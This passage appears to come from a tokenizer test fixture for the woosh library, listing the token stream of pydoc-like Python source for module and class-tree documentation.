woosh.Token(woosh.NAME, 'result', 1189, 16, 1189, 22),
woosh.Token(woosh.OP, '=', 1189, 23, 1189, 24),
woosh.Token(woosh.NAME, 'result', 1189, 25, 1189, 31),
woosh.Token(woosh.OP, '+', 1189, 32, 1189, 33),
woosh.Token(woosh.NAME, 'prefix', 1189, 34, 1189, 40),
woosh.Token(woosh.OP, '+', 1189, 41, 1189, 42),
woosh.Token(woosh.NAME, 'classname', 1189, 43, 1189, 52),
woosh.Token(woosh.OP, '(', 1189, 52, 1189, 53),
woosh.Token(woosh.NAME, 'c', 1189, 53, 1189, 54),
woosh.Token(woosh.OP, ',', 1189, 54, 1189, 55),
woosh.Token(woosh.NAME, 'modname', 1189, 56, 1189, 63),
woosh.Token(woosh.OP, ')', 1189, 63, 1189, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1189, 64, 1190, 0),
woosh.Token(woosh.NAME, 'if', 1190, 16, 1190, 18),
woosh.Token(woosh.NAME, 'bases', 1190, 19, 1190, 24),
woosh.Token(woosh.NAME, 'and', 1190, 25, 1190, 28),
woosh.Token(woosh.NAME, 'bases', 1190, 29, 1190, 34),
woosh.Token(woosh.OP, '!=', 1190, 35, 1190, 37),
woosh.Token(woosh.OP, '(', 1190, 38, 1190, 39),
woosh.Token(woosh.NAME, 'parent', 1190, 39, 1190, 45),
woosh.Token(woosh.OP, ',', 1190, 45, 1190, 46),
woosh.Token(woosh.OP, ')', 1190, 46, 1190, 47),
woosh.Token(woosh.OP, ':', 1190, 47, 1190, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1190, 48, 1191, 0),
woosh.Token(woosh.INDENT, ' ', 1191, 0, 1191, 20),
woosh.Token(woosh.NAME, 'parents', 1191, 20, 1191, 27),
woosh.Token(woosh.OP, '=', 1191, 28, 1191, 29),
woosh.Token(woosh.OP, '(', 1191, 30, 1191, 31),
woosh.Token(woosh.NAME, 'classname', 1191, 31, 1191, 40),
woosh.Token(woosh.OP, '(', 1191, 40, 1191, 41),
woosh.Token(woosh.NAME, 'c', 1191, 41, 1191, 42),
woosh.Token(woosh.OP, ',', 1191, 42, 1191, 43),
woosh.Token(woosh.NAME, 'modname', 1191, 44, 1191, 51),
woosh.Token(woosh.OP, ')', 1191, 51, 1191, 52),
woosh.Token(woosh.NAME, 'for', 1191, 53, 1191, 56),
woosh.Token(woosh.NAME, 'c', 1191, 57, 1191, 58),
woosh.Token(woosh.NAME, 'in', 1191, 59, 1191, 61),
woosh.Token(woosh.NAME, 'bases', 1191, 62, 1191, 67),
woosh.Token(woosh.OP, ')', 1191, 67, 1191, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 1191, 68, 1192, 0),
woosh.Token(woosh.NAME, 'result', 1192, 20, 1192, 26),
woosh.Token(woosh.OP, '=', 1192, 27, 1192, 28),
woosh.Token(woosh.NAME, 'result', 1192, 29, 1192, 35),
woosh.Token(woosh.OP, '+', 1192, 36, 1192, 37),
woosh.Token(woosh.STRING, "'(%s)'", 1192, 38, 1192, 44),
woosh.Token(woosh.OP, '%', 1192, 45, 1192, 46),
woosh.Token(woosh.STRING, "', '", 1192, 47, 1192, 51),
woosh.Token(woosh.OP, '.', 1192, 51, 1192, 52),
woosh.Token(woosh.NAME, 'join', 1192, 52, 1192, 56),
woosh.Token(woosh.OP, '(', 1192, 56, 1192, 57),
woosh.Token(woosh.NAME, 'parents', 1192, 57, 1192, 64),
woosh.Token(woosh.OP, ')', 1192, 64, 1192, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1192, 65, 1193, 0),
woosh.Token(woosh.DEDENT, ' ', 1193, 0, 1193, 16),
woosh.Token(woosh.NAME, 'result', 1193, 16, 1193, 22),
woosh.Token(woosh.OP, '=', 1193, 23, 1193, 24),
woosh.Token(woosh.NAME, 'result', 1193, 25, 1193, 31),
woosh.Token(woosh.OP, '+', 1193, 32, 1193, 33),
woosh.Token(woosh.STRING, "'\\n'", 1193, 34, 1193, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1193, 38, 1194, 0),
woosh.Token(woosh.DEDENT, ' ', 1194, 0, 1194, 12),
woosh.Token(woosh.NAME, 'elif', 1194, 12, 1194, 16),
woosh.Token(woosh.NAME, 'type', 1194, 17, 1194, 21),
woosh.Token(woosh.OP, '(', 1194, 21, 1194, 22),
woosh.Token(woosh.NAME, 'entry', 1194, 22, 1194, 27),
woosh.Token(woosh.OP, ')', 1194, 27, 1194, 28),
woosh.Token(woosh.NAME, 'is', 1194, 29, 1194, 31),
woosh.Token(woosh.NAME, 'type', 1194, 32, 1194, 36),
woosh.Token(woosh.OP, '(', 1194, 36, 1194, 37),
woosh.Token(woosh.OP, '[', 1194, 37, 1194, 38),
woosh.Token(woosh.OP, ']', 1194, 38, 1194, 39),
woosh.Token(woosh.OP, ')', 1194, 39, 1194, 40),
woosh.Token(woosh.OP, ':', 1194, 40, 1194, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1194, 41, 1195, 0),
woosh.Token(woosh.INDENT, ' ', 1195, 0, 1195, 16),
woosh.Token(woosh.NAME, 'result', 1195, 16, 1195, 22),
woosh.Token(woosh.OP, '=', 1195, 23, 1195, 24),
woosh.Token(woosh.NAME, 'result', 1195, 25, 1195, 31),
woosh.Token(woosh.OP, '+', 1195, 32, 1195, 33),
woosh.Token(woosh.NAME, 'self', 1195, 34, 1195, 38),
woosh.Token(woosh.OP, '.', 1195, 38, 1195, 39),
woosh.Token(woosh.NAME, 'formattree', 1195, 39, 1195, 49),
woosh.Token(woosh.OP, '(', 1195, 49, 1195, 50),
woosh.Token(woosh.NAME, 'entry', 1196, 20, 1196, 25),
woosh.Token(woosh.OP, ',', 1196, 25, 1196, 26),
woosh.Token(woosh.NAME, 'modname', 1196, 27, 1196, 34),
woosh.Token(woosh.OP, ',', 1196, 34, 1196, 35),
woosh.Token(woosh.NAME, 'c', 1196, 36, 1196, 37),
woosh.Token(woosh.OP, ',', 1196, 37, 1196, 38),
woosh.Token(woosh.NAME, 'prefix', 1196, 39, 1196, 45),
woosh.Token(woosh.OP, '+', 1196, 46, 1196, 47),
woosh.Token(woosh.STRING, "' '", 1196, 48, 1196, 54),
woosh.Token(woosh.OP, ')', 1196, 54, 1196, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1196, 55, 1197, 0),
woosh.Token(woosh.DEDENT, ' ', 1197, 0, 1197, 8),
woosh.Token(woosh.DEDENT, '', 1197, 8, 1197, 8),
woosh.Token(woosh.NAME, 'return', 1197, 8, 1197, 14),
woosh.Token(woosh.NAME, 'result', 1197, 15, 1197, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1197, 21, 1198, 0),
woosh.Token(woosh.DEDENT, ' ', 1199, 0, 1199, 4),
woosh.Token(woosh.NAME, 'def', 1199, 4, 1199, 7),
woosh.Token(woosh.NAME, 'docmodule', 1199, 8, 1199, 17),
woosh.Token(woosh.OP, '(', 1199, 17, 1199, 18),
woosh.Token(woosh.NAME, 'self', 1199, 18, 1199, 22),
woosh.Token(woosh.OP, ',', 1199, 22, 1199, 23),
woosh.Token(woosh.NAME, 'object', 1199, 24, 1199, 30),
woosh.Token(woosh.OP, ',', 1199, 30, 1199, 31),
woosh.Token(woosh.NAME, 'name', 1199, 32, 1199, 36),
woosh.Token(woosh.OP, '=', 1199, 36, 1199, 37),
woosh.Token(woosh.NAME, 'None', 1199, 37, 1199, 41),
woosh.Token(woosh.OP, ',', 1199, 41, 1199, 42),
woosh.Token(woosh.NAME, 'mod', 1199, 43, 1199, 46),
woosh.Token(woosh.OP, '=', 1199, 46, 1199, 47),
woosh.Token(woosh.NAME, 'None', 1199, 47, 1199, 51),
woosh.Token(woosh.OP, ')', 1199, 51, 1199, 52),
woosh.Token(woosh.OP, ':', 1199, 52, 1199, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1199, 53, 1200, 0),
woosh.Token(woosh.INDENT, ' ', 1200, 0, 1200, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a given module object."""', 1200, 8, 1200, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1200, 67, 1201, 0),
woosh.Token(woosh.NAME, 'name', 1201, 8, 1201, 12),
woosh.Token(woosh.OP, '=', 1201, 13, 1201, 14),
woosh.Token(woosh.NAME, 'object', 1201, 15, 1201, 21),
woosh.Token(woosh.OP, '.', 1201, 21, 1201, 22),
woosh.Token(woosh.NAME, '__name__', 1201, 22, 1201, 30),
woosh.Token(woosh.COMMENT, '# ignore the passed-in name', 1201, 31, 1201, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1201, 58, 1202, 0),
woosh.Token(woosh.NAME, 'synop', 1202, 8, 1202, 13),
woosh.Token(woosh.OP, ',', 1202, 13, 1202, 14),
woosh.Token(woosh.NAME, 'desc', 1202, 15, 1202, 19),
woosh.Token(woosh.OP, '=', 1202, 20, 1202, 21),
woosh.Token(woosh.NAME, 'splitdoc', 1202, 22, 1202, 30),
woosh.Token(woosh.OP, '(', 1202, 30, 1202, 31),
woosh.Token(woosh.NAME, 'getdoc', 1202, 31, 1202, 37),
woosh.Token(woosh.OP, '(', 1202, 37, 1202, 38),
woosh.Token(woosh.NAME, 'object', 1202, 38, 1202, 44),
woosh.Token(woosh.OP, ')', 1202, 44, 1202, 45),
woosh.Token(woosh.OP, ')', 1202, 45, 1202, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1202, 46, 1203, 0),
woosh.Token(woosh.NAME, 'result', 1203, 8, 1203, 14),
woosh.Token(woosh.OP, '=', 1203, 15, 1203, 16),
woosh.Token(woosh.NAME, 'self', 1203, 17, 1203, 21),
woosh.Token(woosh.OP, '.', 1203, 21, 1203, 22),
woosh.Token(woosh.NAME, 'section', 1203, 22, 1203, 29),
woosh.Token(woosh.OP, '(', 1203, 29, 1203, 30),
woosh.Token(woosh.STRING, "'NAME'", 1203, 30, 1203, 36),
woosh.Token(woosh.OP, ',', 1203, 36, 1203, 37),
woosh.Token(woosh.NAME, 'name', 1203, 38, 1203, 42),
woosh.Token(woosh.OP, '+', 1203, 43, 1203, 44),
woosh.Token(woosh.OP, '(', 1203, 45, 1203, 46),
woosh.Token(woosh.NAME, 'synop', 1203, 46, 1203, 51),
woosh.Token(woosh.NAME, 'and', 1203, 52, 1203, 55),
woosh.Token(woosh.STRING, "' - '", 1203, 56, 1203, 61),
woosh.Token(woosh.OP, '+', 1203, 62, 1203, 63),
woosh.Token(woosh.NAME, 'synop', 1203, 64, 1203, 69),
woosh.Token(woosh.OP, ')', 1203, 69, 1203, 70),
woosh.Token(woosh.OP, ')', 1203, 70, 1203, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1203, 71, 1204, 0),
woosh.Token(woosh.NAME, 'all', 1204, 8, 1204, 11),
woosh.Token(woosh.OP, '=', 1204, 12, 1204, 13),
woosh.Token(woosh.NAME, 'getattr', 1204, 14, 1204, 21),
woosh.Token(woosh.OP, '(', 1204, 21, 1204, 22),
woosh.Token(woosh.NAME, 'object', 1204, 22, 1204, 28),
woosh.Token(woosh.OP, ',', 1204, 28, 1204, 29),
woosh.Token(woosh.STRING, "'__all__'", 1204, 30, 1204, 39),
woosh.Token(woosh.OP, ',', 1204, 39, 1204, 40),
woosh.Token(woosh.NAME, 'None', 1204, 41, 1204, 45),
woosh.Token(woosh.OP, ')', 1204, 45, 1204, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1204, 46, 1205, 0),
woosh.Token(woosh.NAME, 'docloc', 1205, 8, 1205, 14),
woosh.Token(woosh.OP, '=', 1205, 15, 1205, 16),
woosh.Token(woosh.NAME, 'self', 1205, 17, 1205, 21),
woosh.Token(woosh.OP, '.', 1205, 21, 1205, 22),
woosh.Token(woosh.NAME, 'getdocloc', 1205, 22, 1205, 31),
woosh.Token(woosh.OP, '(', 1205, 31, 1205, 32),
woosh.Token(woosh.NAME, 'object', 1205, 32, 1205, 38),
woosh.Token(woosh.OP, ')', 1205, 38, 1205, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1205, 39, 1206, 0),
woosh.Token(woosh.NAME, 'if', 1206, 8, 1206, 10),
woosh.Token(woosh.NAME, 'docloc', 1206, 11, 1206, 17),
woosh.Token(woosh.NAME, 'is', 1206, 18, 1206, 20),
woosh.Token(woosh.NAME, 'not', 1206, 21, 1206, 24),
woosh.Token(woosh.NAME, 'None', 1206, 25, 1206, 29),
woosh.Token(woosh.OP, ':', 1206, 29, 1206, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1206, 30, 1207, 0),
woosh.Token(woosh.INDENT, ' ', 1207, 0, 1207, 12),
woosh.Token(woosh.NAME, 'result', 1207, 12, 1207, 18),
woosh.Token(woosh.OP, '=', 1207, 19, 1207, 20),
woosh.Token(woosh.NAME, 'result', 1207, 21, 1207, 27),
woosh.Token(woosh.OP, '+', 1207, 28, 1207, 29),
woosh.Token(woosh.NAME, 'self', 1207, 30, 1207, 34),
woosh.Token(woosh.OP, '.', 1207, 34, 1207, 35),
woosh.Token(woosh.NAME, 'section', 1207, 35, 1207, 42),
woosh.Token(woosh.OP, '(', 1207, 42, 1207, 43),
woosh.Token(woosh.STRING, "'MODULE REFERENCE'", 1207, 43, 1207, 61),
woosh.Token(woosh.OP, ',', 1207, 61, 1207, 62),
woosh.Token(woosh.NAME, 'docloc', 1207, 63, 1207, 69),
woosh.Token(woosh.OP, '+', 1207, 70, 1207, 71),
woosh.Token(woosh.STRING, '"""\r\n\r\nThe following documentation is automatically generated from the Python\r\nsource files. It may be incomplete, incorrect or include features that\r\nare considered implementation detail and may vary between Python\r\nimplementations. When in doubt, consult the module reference at the\r\nlocation listed above.\r\n"""', 1207, 72, 1214, 3),
woosh.Token(woosh.OP, ')', 1214, 3, 1214, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 1214, 4, 1215, 0),
woosh.Token(woosh.DEDENT, ' ', 1216, 0, 1216, 8),
woosh.Token(woosh.NAME, 'if', 1216, 8, 1216, 10),
woosh.Token(woosh.NAME, 'desc', 1216, 11, 1216, 15),
woosh.Token(woosh.OP, ':', 1216, 15, 1216, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1216, 16, 1217, 0),
woosh.Token(woosh.INDENT, ' ', 1217, 0, 1217, 12),
woosh.Token(woosh.NAME, 'result', 1217, 12, 1217, 18),
woosh.Token(woosh.OP, '=', 1217, 19, 1217, 20),
woosh.Token(woosh.NAME, 'result', 1217, 21, 1217, 27),
woosh.Token(woosh.OP, '+', 1217, 28, 1217, 29),
woosh.Token(woosh.NAME, 'self', 1217, 30, 1217, 34),
woosh.Token(woosh.OP, '.', 1217, 34, 1217, 35),
woosh.Token(woosh.NAME, 'section', 1217, 35, 1217, 42),
woosh.Token(woosh.OP, '(', 1217, 42, 1217, 43),
woosh.Token(woosh.STRING, "'DESCRIPTION'", 1217, 43, 1217, 56),
woosh.Token(woosh.OP, ',', 1217, 56, 1217, 57),
woosh.Token(woosh.NAME, 'desc', 1217, 58, 1217, 62),
woosh.Token(woosh.OP, ')', 1217, 62, 1217, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1217, 63, 1218, 0),
woosh.Token(woosh.DEDENT, ' ', 1219, 0, 1219, 8),
woosh.Token(woosh.NAME, 'classes', 1219, 8, 1219, 15),
woosh.Token(woosh.OP, '=', 1219, 16, 1219, 17),
woosh.Token(woosh.OP, '[', 1219, 18, 1219, 19),
woosh.Token(woosh.OP, ']', 1219, 19, 1219, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1219, 20, 1220, 0),
woosh.Token(woosh.NAME, 'for', 1220, 8, 1220, 11),
woosh.Token(woosh.NAME, 'key', 1220, 12, 1220, 15),
woosh.Token(woosh.OP, ',', 1220, 15, 1220, 16),
woosh.Token(woosh.NAME, 'value', 1220, 17, 1220, 22),
woosh.Token(woosh.NAME, 'in', 1220, 23, 1220, 25),
woosh.Token(woosh.NAME, 'inspect', 1220, 26, 1220, 33),
woosh.Token(woosh.OP, '.', 1220, 33, 1220, 34),
woosh.Token(woosh.NAME, 'getmembers', 1220, 34, 1220, 44),
woosh.Token(woosh.OP, '(', 1220, 44, 1220, 45),
woosh.Token(woosh.NAME, 'object', 1220, 45, 1220, 51),
woosh.Token(woosh.OP, ',', 1220, 51, 1220, 52),
woosh.Token(woosh.NAME, 'inspect', 1220, 53, 1220, 60),
woosh.Token(woosh.OP, '.', 1220, 60, 1220, 61),
woosh.Token(woosh.NAME, 'isclass', 1220, 61, 1220, 68),
woosh.Token(woosh.OP, ')', 1220, 68, 1220, 69),
woosh.Token(woosh.OP, ':', 1220, 69, 1220, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1220, 70, 1221, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 1221, 12, 1221, 74),
woosh.Token(woosh.INDENT, ' ', 1222, 0, 1222, 12),
woosh.Token(woosh.NAME, 'if', 1222, 12, 1222, 14),
woosh.Token(woosh.OP, '(', 1222, 15, 1222, 16),
woosh.Token(woosh.NAME, 'all', 1222, 16, 1222, 19),
woosh.Token(woosh.NAME, 'is', 1222, 20, 1222, 22),
woosh.Token(woosh.NAME, 'not', 1222, 23, 1222, 26),
woosh.Token(woosh.NAME, 'None', 1222, 27, 1222, 31),
woosh.Token(woosh.NAME, 'or', 1223, 16, 1223, 18),
woosh.Token(woosh.OP, '(', 1223, 19, 1223, 20),
woosh.Token(woosh.NAME, 'inspect', 1223, 20, 1223, 27),
woosh.Token(woosh.OP, '.', 1223, 27, 1223, 28),
woosh.Token(woosh.NAME, 'getmodule', 1223, 28, 1223, 37),
woosh.Token(woosh.OP, '(', 1223, 37, 1223, 38),
woosh.Token(woosh.NAME, 'value', 1223, 38, 1223, 43),
woosh.Token(woosh.OP, ')', 1223, 43, 1223, 44),
woosh.Token(woosh.NAME, 'or', 1223, 45, 1223, 47),
woosh.Token(woosh.NAME, 'object', 1223, 48, 1223, 54),
woosh.Token(woosh.OP, ')', 1223, 54, 1223, 55),
woosh.Token(woosh.NAME, 'is', 1223, 56, 1223, 58),
woosh.Token(woosh.NAME, 'object', 1223, 59, 1223, 65),
woosh.Token(woosh.OP, ')', 1223, 65, 1223, 66),
woosh.Token(woosh.OP, ':', 1223, 66, 1223, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1223, 67, 1224, 0),
woosh.Token(woosh.INDENT, ' ', 1224, 0, 1224, 16),
woosh.Token(woosh.NAME, 'if', 1224, 16, 1224, 18),
woosh.Token(woosh.NAME, 'visiblename', 1224, 19, 1224, 30),
woosh.Token(woosh.OP, '(', 1224, 30, 1224, 31),
woosh.Token(woosh.NAME, 'key', 1224, 31, 1224, 34),
woosh.Token(woosh.OP, ',', 1224, 34, 1224, 35),
woosh.Token(woosh.NAME, 'all', 1224, 36, 1224, 39),
woosh.Token(woosh.OP, ',', 1224, 39, 1224, 40),
woosh.Token(woosh.NAME, 'object', 1224, 41, 1224, 47),
woosh.Token(woosh.OP, ')', 1224, 47, 1224, 48),
woosh.Token(woosh.OP, ':', 1224, 48, 1224, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1224, 49, 1225, 0),
woosh.Token(woosh.INDENT, ' ', 1225, 0, 1225, 20),
woosh.Token(woosh.NAME, 'classes', 1225, 20, 1225, 27),
woosh.Token(woosh.OP, '.', 1225, 27, 1225, 28),
woosh.Token(woosh.NAME, 'append', 1225, 28, 1225, 34),
woosh.Token(woosh.OP, '(', 1225, 34, 1225, 35),
woosh.Token(woosh.OP, '(', 1225, 35, 1225, 36),
woosh.Token(woosh.NAME, 'key', 1225, 36, 1225, 39),
woosh.Token(woosh.OP, ',', 1225, 39, 1225, 40),
woosh.Token(woosh.NAME, 'value', 1225, 41, 1225, 46),
woosh.Token(woosh.OP, ')', 1225, 46, 1225, 47),
woosh.Token(woosh.OP, ')', 1225, 47, 1225, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1225, 48, 1226, 0),
woosh.Token(woosh.DEDENT, ' ', 1226, 0, 1226, 8),
woosh.Token(woosh.DEDENT, '', 1226, 8, 1226, 8),
woosh.Token(woosh.DEDENT, '', 1226, 8, 1226, 8),
woosh.Token(woosh.NAME, 'funcs', 1226, 8, 1226, 13),
woosh.Token(woosh.OP, '=', 1226, 14, 1226, 15),
woosh.Token(woosh.OP, '[', 1226, 16, 1226, 17),
woosh.Token(woosh.OP, ']', 1226, 17, 1226, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1226, 18, 1227, 0),
woosh.Token(woosh.NAME, 'for', 1227, 8, 1227, 11),
woosh.Token(woosh.NAME, 'key', 1227, 12, 1227, 15),
woosh.Token(woosh.OP, ',', 1227, 15, 1227, 16),
woosh.Token(woosh.NAME, 'value', 1227, 17, 1227, 22),
woosh.Token(woosh.NAME, 'in', 1227, 23, 1227, 25),
woosh.Token(woosh.NAME, 'inspect', 1227, 26, 1227, 33),
woosh.Token(woosh.OP, '.', 1227, 33, 1227, 34),
woosh.Token(woosh.NAME, 'getmembers', 1227, 34, 1227, 44),
woosh.Token(woosh.OP, '(', 1227, 44, 1227, 45),
woosh.Token(woosh.NAME, 'object', 1227, 45, 1227, 51),
woosh.Token(woosh.OP, ',', 1227, 51, 1227, 52),
woosh.Token(woosh.NAME, 'inspect', 1227, 53, 1227, 60),
woosh.Token(woosh.OP, '.', 1227, 60, 1227, 61),
woosh.Token(woosh.NAME, 'isroutine', 1227, 61, 1227, 70),
woosh.Token(woosh.OP, ')', 1227, 70, 1227, 71),
woosh.Token(woosh.OP, ':', 1227, 71, 1227, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1227, 72, 1228, 0),
woosh.Token(woosh.COMMENT, '# if __all__ exists, believe it. Otherwise use old heuristic.', 1228, 12, 1228, 74),
woosh.Token(woosh.INDENT, ' ', 1229, 0, 1229, 12),
woosh.Token(woosh.NAME, 'if', 1229, 12, 1229, 14),
woosh.Token(woosh.OP, '(', 1229, 15, 1229, 16),
woosh.Token(woosh.NAME, 'all', 1229, 16, 1229, 19),
woosh.Token(woosh.NAME, 'is', 1229, 20, 1229, 22),
woosh.Token(woosh.NAME, 'not', 1229, 23, 1229, 26),
woosh.Token(woosh.NAME, 'None', 1229, 27, 1229, 31),
woosh.Token(woosh.NAME, 'or', 1229, 32, 1229, 34),
woosh.Token(woosh.NAME, 'inspect', 1230, 16, 1230, 23),
woosh.Token(woosh.OP, '.', 1230, 23, 1230, 24),
woosh.Token(woosh.NAME, 'isbuiltin', 1230, 24, 1230, 33),
woosh.Token(woosh.OP, '(', 1230, 33, 1230, 34),
woosh.Token(woosh.NAME, 'value', 1230, 34, 1230, 39),
woosh.Token(woosh.OP, ')', 1230, 39, 1230, 40),
woosh.Token(woosh.NAME, 'or', 1230, 41, 1230, 43),
woosh.Token(woosh.NAME, 'inspect', 1230, 44, 1230, 51),
woosh.Token(woosh.OP, '.', 1230, 51, 1230, 52),
woosh.Token(woosh.NAME, 'getmodule', 1230, 52, 1230, 61),
woosh.Token(woosh.OP, '(', 1230, 61, 1230, 62),
woosh.Token(woosh.NAME, 'value', 1230, 62, 1230, 67),
woosh.Token(woosh.OP, ')', 1230, 67, 1230, 68),
woosh.Token(woosh.NAME, 'is', 1230, 69, 1230, 71),
woosh.Token(woosh.NAME, 'object', 1230, 72, 1230, 78),
woosh.Token(woosh.OP, ')', 1230, 78, 1230, 79),
woosh.Token(woosh.OP, ':', 1230, 79, 1230, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 1230, 80, 1231, 0),
woosh.Token(woosh.INDENT, ' ', 1231, 0, 1231, 16),
woosh.Token(woosh.NAME, 'if', 1231, 16, 1231, 18),
woosh.Token(woosh.NAME, 'visiblename', 1231, 19, 1231, 30),
woosh.Token(woosh.OP, '(', 1231, 30, 1231, 31),
woosh.Token(woosh.NAME, 'key', 1231, 31, 1231, 34),
woosh.Token(woosh.OP, ',', 1231, 34, 1231, 35),
woosh.Token(woosh.NAME, 'all', 1231, 36, 1231, 39),
woosh.Token(woosh.OP, ',', 1231, 39, 1231, 40),
woosh.Token(woosh.NAME, 'object', 1231, 41, 1231, 47),
woosh.Token(woosh.OP, ')', 1231, 47, 1231, 48),
woosh.Token(woosh.OP, ':', 1231, 48, 1231, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1231, 49, 1232, 0),
woosh.Token(woosh.INDENT, ' ', 1232, 0, 1232, 20),
woosh.Token(woosh.NAME, 'funcs', 1232, 20, 1232, 25),
woosh.Token(woosh.OP, '.', 1232, 25, 1232, 26),
woosh.Token(woosh.NAME, 'append', 1232, 26, 1232, 32),
woosh.Token(woosh.OP, '(', 1232, 32, 1232, 33),
woosh.Token(woosh.OP, '(', 1232, 33, 1232, 34),
woosh.Token(woosh.NAME, 'key', 1232, 34, 1232, 37),
woosh.Token(woosh.OP, ',', 1232, 37, 1232, 38),
woosh.Token(woosh.NAME, 'value', 1232, 39, 1232, 44),
woosh.Token(woosh.OP, ')', 1232, 44, 1232, 45),
woosh.Token(woosh.OP, ')', 1232, 45, 1232, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1232, 46, 1233, 0),
woosh.Token(woosh.DEDENT, ' ', 1233, 0, 1233, 8),
woosh.Token(woosh.DEDENT, '', 1233, 8, 1233, 8),
woosh.Token(woosh.DEDENT, '', 1233, 8, 1233, 8),
woosh.Token(woosh.NAME, 'data', 1233, 8, 1233, 12),
woosh.Token(woosh.OP, '=', 1233, 13, 1233, 14),
woosh.Token(woosh.OP, '[', 1233, 15, 1233, 16),
woosh.Token(woosh.OP, ']', 1233, 16, 1233, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1233, 17, 1234, 0),
woosh.Token(woosh.NAME, 'for', 1234, 8, 1234, 11),
woosh.Token(woosh.NAME, 'key', 1234, 12, 1234, 15),
woosh.Token(woosh.OP, ',', 1234, 15, 1234, 16),
woosh.Token(woosh.NAME, 'value', 1234, 17, 1234, 22),
woosh.Token(woosh.NAME, 'in', 1234, 23, 1234, 25),
woosh.Token(woosh.NAME, 'inspect', 1234, 26, 1234, 33),
woosh.Token(woosh.OP, '.', 1234, 33, 1234, 34),
woosh.Token(woosh.NAME, 'getmembers', 1234, 34, 1234, 44),
woosh.Token(woosh.OP, '(', 1234, 44, 1234, 45),
woosh.Token(woosh.NAME, 'object', 1234, 45, 1234, 51),
woosh.Token(woosh.OP, ',', 1234, 51, 1234, 52),
woosh.Token(woosh.NAME, 'isdata', 1234, 53, 1234, 59),
woosh.Token(woosh.OP, ')', 1234, 59, 1234, 60),
woosh.Token(woosh.OP, ':', 1234, 60, 1234, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1234, 61, 1235, 0),
woosh.Token(woosh.INDENT, ' ', 1235, 0, 1235, 12),
woosh.Token(woosh.NAME, 'if', 1235, 12, 1235, 14),
woosh.Token(woosh.NAME, 'visiblename', 1235, 15, 1235, 26),
woosh.Token(woosh.OP, '(', 1235, 26, 1235, 27),
woosh.Token(woosh.NAME, 'key', 1235, 27, 1235, 30),
woosh.Token(woosh.OP, ',', 1235, 30, 1235, 31),
woosh.Token(woosh.NAME, 'all', 1235, 32, 1235, 35),
woosh.Token(woosh.OP, ',', 1235, 35, 1235, 36),
woosh.Token(woosh.NAME, 'object', 1235, 37, 1235, 43),
woosh.Token(woosh.OP, ')', 1235, 43, 1235, 44),
woosh.Token(woosh.OP, ':', 1235, 44, 1235, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1235, 45, 1236, 0),
woosh.Token(woosh.INDENT, ' ', 1236, 0, 1236, 16),
woosh.Token(woosh.NAME, 'data', 1236, 16, 1236, 20),
woosh.Token(woosh.OP, '.', 1236, 20, 1236, 21),
woosh.Token(woosh.NAME, 'append', 1236, 21, 1236, 27),
woosh.Token(woosh.OP, '(', 1236, 27, 1236, 28),
woosh.Token(woosh.OP, '(', 1236, 28, 1236, 29),
woosh.Token(woosh.NAME, 'key', 1236, 29, 1236, 32),
woosh.Token(woosh.OP, ',', 1236, 32, 1236, 33),
woosh.Token(woosh.NAME, 'value', 1236, 34, 1236, 39),
woosh.Token(woosh.OP, ')', 1236, 39, 1236, 40),
woosh.Token(woosh.OP, ')', 1236, 40, 1236, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1236, 41, 1237, 0),
woosh.Token(woosh.DEDENT, ' ', 1238, 0, 1238, 8),
woosh.Token(woosh.DEDENT, '', 1238, 8, 1238, 8),
woosh.Token(woosh.NAME, 'modpkgs', 1238, 8, 1238, 15),
woosh.Token(woosh.OP, '=', 1238, 16, 1238, 17),
woosh.Token(woosh.OP, '[', 1238, 18, 1238, 19),
woosh.Token(woosh.OP, ']', 1238, 19, 1238, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1238, 20, 1239, 0),
woosh.Token(woosh.NAME, 'modpkgs_names', 1239, 8, 1239, 21),
woosh.Token(woosh.OP, '=', 1239, 22, 1239, 23),
woosh.Token(woosh.NAME, 'set', 1239, 24, 1239, 27),
woosh.Token(woosh.OP, '(', 1239, 27, 1239, 28),
woosh.Token(woosh.OP, ')', 1239, 28, 1239, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1239, 29, 1240, 0),
woosh.Token(woosh.NAME, 'if', 1240, 8, 1240, 10),
woosh.Token(woosh.NAME, 'hasattr', 1240, 11, 1240, 18),
woosh.Token(woosh.OP, '(', 1240, 18, 1240, 19),
woosh.Token(woosh.NAME, 'object', 1240, 19, 1240, 25),
woosh.Token(woosh.OP, ',', 1240, 25, 1240, 26),
woosh.Token(woosh.STRING, "'__path__'", 1240, 27, 1240, 37),
woosh.Token(woosh.OP, ')', 1240, 37, 1240, 38),
woosh.Token(woosh.OP, ':', 1240, 38, 1240, 39),
